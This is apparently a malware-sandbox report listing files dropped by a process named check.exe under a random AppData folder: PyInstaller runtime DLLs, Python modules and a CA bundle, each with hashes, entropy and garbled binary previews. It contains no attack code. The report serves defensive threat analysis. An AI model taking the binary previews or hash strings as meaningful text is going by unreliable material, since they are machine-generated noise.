                                                                                                                                                                                                                                      SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                                                      MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                                                      SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
                                                                                                                                                                                                                                      SHA-256:B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
                                                                                                                                                                                                                                      SHA-512:783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_socket.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83728
                                                                                                                                                                                                                                      Entropy (8bit):6.331814573029388
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
                                                                                                                                                                                                                                      MD5:FE896371430BD9551717EF12A3E7E818
                                                                                                                                                                                                                                      SHA1:E2A7716E9CE840E53E8FC79D50A77F40B353C954
                                                                                                                                                                                                                                      SHA-256:35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
                                                                                                                                                                                                                                      SHA-512:67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_ssl.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181520
                                                                                                                                                                                                                                      Entropy (8bit):5.972827303352998
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
                                                                                                                                                                                                                                      MD5:1C0E3E447F719FBE2601D0683EA566FC
                                                                                                                                                                                                                                      SHA1:5321AB73B36675B238AB3F798C278195223CD7B1
                                                                                                                                                                                                                                      SHA-256:63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
                                                                                                                                                                                                                                      SHA-512:E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_wmi.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38160
                                                                                                                                                                                                                                      Entropy (8bit):6.338856805460127
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
                                                                                                                                                                                                                                      MD5:1C30CC7DF3BD168D883E93C593890B43
                                                                                                                                                                                                                                      SHA1:31465425F349DAE4EDAC9D0FEABC23CE83400807
                                                                                                                                                                                                                                      SHA-256:6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
                                                                                                                                                                                                                                      SHA-512:267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\base_library.zip

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1394456
                                                                                                                                                                                                                                      Entropy (8bit):5.531698507573688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                                                      MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                                                      SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                                                      SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                                                      SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\certifi\cacert.pem

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):299427
                                                                                                                                                                                                                                      Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                      MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                      SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                      SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                      SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\charset_normalizer\md.cp313-win_amd64.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                                                                                      Entropy (8bit):4.818583535960129
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
                                                                                                                                                                                                                                      MD5:56FE4F6C7E88212161F49E823CCC989A
                                                                                                                                                                                                                                      SHA1:16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
                                                                                                                                                                                                                                      SHA-256:002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
                                                                                                                                                                                                                                      SHA-512:7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):124928
                                                                                                                                                                                                                                      Entropy (8bit):5.953784637413928
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
                                                                                                                                                                                                                                      MD5:10116447F9276F10664BA85A5614BA3A
                                                                                                                                                                                                                                      SHA1:EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
                                                                                                                                                                                                                                      SHA-256:C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
                                                                                                                                                                                                                                      SHA-512:C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\libcrypto-3.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5232408
                                                                                                                                                                                                                                      Entropy (8bit):5.940072183736028
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                                                      MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                                                      SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                                                      SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                                                      SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\libffi-8.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):39696
                                                                                                                                                                                                                                      Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                      MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                      SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                      SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                      SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\libssl-3.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):792856
                                                                                                                                                                                                                                      Entropy (8bit):5.57949182561317
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                                                      MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                                                      SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                                                      SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                                                      SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\psutil\_psutil_windows.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):67072
                                                                                                                                                                                                                                      Entropy (8bit):5.909456553599775
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:j3sHmR02IvVxv7WCyKm7c5Th4JBHTOvyyaZE:jnIvryCyKx5Th4J5OvyyO
                                                                                                                                                                                                                                      MD5:49AC12A1F10AB93FAFAB064FD0523A63
                                                                                                                                                                                                                                      SHA1:3AD6923AB0FB5D3DD9D22ED077DB15B42C2FBD4F
                                                                                                                                                                                                                                      SHA-256:BA033B79E858DBFCBA6BF8FB5AFE10DEFD1CB03957DBBC68E8E62E4DE6DF492D
                                                                                                                                                                                                                                      SHA-512:1BC0F50E0BB0A9D9DDDAD31390E5C73B0D11C2B0A8C5462065D477E93FF21F7EDC7AA2B2B36E478BE0A797A38F43E3FBEB6AAABEF0BADEC1D8D16EB73DF67255
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nT..*5..*5..*5..#M2. 5..x@..(5..x@..&5..x@.."5..x@...5...k..(5..aM..;5..*5...5...@..:5...@..+5...@^.+5...@..+5..Rich*5..................PE..d...._.g.........." .........h......\........................................@............`.........................................0...`.......@.... .......................0..(.......................................8............................................text...h........................... ..`.rdata..\I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\python3.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70416
                                                                                                                                                                                                                                      Entropy (8bit):6.1258200129869405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
                                                                                                                                                                                                                                      MD5:16855EBEF31C5B1EBE767F1C617645B3
                                                                                                                                                                                                                                      SHA1:315521F3A748ABFA35CD4D48E8DD09D0556D989B
                                                                                                                                                                                                                                      SHA-256:A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
                                                                                                                                                                                                                                      SHA-512:C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\python313.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6083856
                                                                                                                                                                                                                                      Entropy (8bit):6.126922729922386
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
                                                                                                                                                                                                                                      MD5:B9DE917B925DD246B709BB4233777EFD
                                                                                                                                                                                                                                      SHA1:775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
                                                                                                                                                                                                                                      SHA-256:0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
                                                                                                                                                                                                                                      SHA-512:F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\select.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):30992
                                                                                                                                                                                                                                      Entropy (8bit):6.554484610649281
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
                                                                                                                                                                                                                                      MD5:20831703486869B470006941B4D996F2
                                                                                                                                                                                                                                      SHA1:28851DFD43706542CD3EF1B88B5E2749562DFEE0
                                                                                                                                                                                                                                      SHA-256:78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
                                                                                                                                                                                                                                      SHA-512:4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\unicodedata.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
